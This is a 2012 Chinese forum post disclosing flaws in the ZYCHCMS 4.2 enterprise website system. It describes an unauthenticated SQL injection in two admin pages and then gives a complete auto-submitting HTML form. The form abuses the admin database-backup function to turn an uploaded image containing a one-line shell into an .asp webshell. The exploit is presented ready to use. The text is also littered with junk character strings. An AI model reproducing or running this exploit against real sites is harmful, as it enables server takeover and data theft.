6 R; @: v# w) O) Q* h" i6 P J" X7 _# g6 }/ }1 {
9 Q" c, |2 P0 Y
" l/ z$ `8 H2 l6 E
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀); C" r# W5 V- [4 F
①SQL注射漏洞& G8 E6 ]! { o7 j t( N5 c
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
3 X7 A# p$ s* A6 B) b& A 漏洞原因:未过滤
4 }$ t, h+ }- T2 {$ |# i 漏洞代码:8 m6 I3 u# w, G) O
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。0 [* ]" x* k) E; j. S
修复方法:在文件开头加入代码 H1 w6 l. s d8 Y: f1 W
" a5 l& i/ f# O, b( u. x* Y0 t
9 R* p4 Z1 x- t# v7 w# c% i②后台拿WBSHELL
, ^6 r% l/ Q( y# K 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
' j+ S& K9 s4 d4 b 这里在网上找了一个,改了下,将就着用。* L- p+ n1 y! k& o7 \, m p8 Y7 L
以下是代码本地提交代码
- q N9 P5 k0 r
& x0 p9 |, h9 Z" J
# U6 \4 w5 _( O<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
, R0 \% K8 p! u- ^, y: Z <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
: J& V7 f6 h# M. J. w <tr>9 Y( G' k4 A- g* e* z" n
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>0 A8 b) _6 g7 z. @. u6 K
</tr>
8 ?% h2 y" i5 P; J2 w, A <tr>
. R" ^% K1 B9 E& l4 c! i <td bgcolor=”#FFFFFF”><span class=”back_southidc”>6 A r/ a/ e0 @* T; Y5 J
</span>: M/ b! @0 n8 B# d. Y
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
* i" r* f# I- A <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
9 ^8 N+ B$ U7 b <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
9 k: l n% e4 u: y) s$ J: |# H <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
3 r5 q* C/ k. ^" C0 i0 K <div align=”left”>3 \% Q0 T' s: e1 `2 Q2 l2 T1 n) S
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
. \6 u: d6 i& J4 N# Z <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
3 p! Y' d' f e) M. t/ z+ ]$ D <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />1 q6 H$ ?1 l4 v4 Y
</div></td>
# v& F2 B+ A$ X2 t2 Z) B! U </tr>+ x0 f, j6 b/ T) `# G$ l) g
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
3 c4 K! @ C- D <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
2 K h1 P( e; d! R# T( V <td class=”td”><div align=”left”>9 f, d! c- K W1 p9 r
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
6 J2 j8 }" @/ A [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>4 w- a$ m$ h$ K( T. v% l
</tr>
, ]: _& I* \' q <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>$ D* x b" U$ S
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td> q8 F3 _& R- j
<td class=”td”><div align=”left”>
) [5 N" i! J% z1 g6 F <input type=”submit” value=”确定备份” class=”btn”2 Y& v2 L. |) s2 y
</div></td>! u% n; M9 I( o& I
</tr>
3 R5 p& k" a5 w. \1 t </table></td></tr></form>
( O% f) B0 b+ T" T </table>% o) s/ m* k& z+ S: b6 z
</td>
2 s5 c/ Y! _5 Y </tr>
: C1 h& I& b4 ^/ l2 } </table>
+ i. A q( M( H1 T5 ]# f' X: j <script>2 x# v' q) E3 Q0 @
document.all.add.submit();
7 Q% V- K% j& U# z8 j </script>3 G& [, N1 G) Y: f. b# ]3 u
3 l+ S6 S8 I. l( _0 G5 }% v
& j" x8 W1 K! W/ U* u% l1 N( M0 P
X2 E) G$ }- F# h5 T% B0 Q+ L8 j
3 { D$ e6 [! c1 o1 T+ I# Y3 ]' }+ d+ q [4 Z7 L G
}4 T% Y6 }! w7 E7 S8 r" o* f& L% {1 e9 l- t7 w( I9 E6 f
2 G( Y4 `- b$ J
$ c& a8 d( Z% ]" ?7 t' v+ |0 I
. j+ x: I6 K5 O |
发表于 2012-9-10 21:09:51
收藏
支持
反对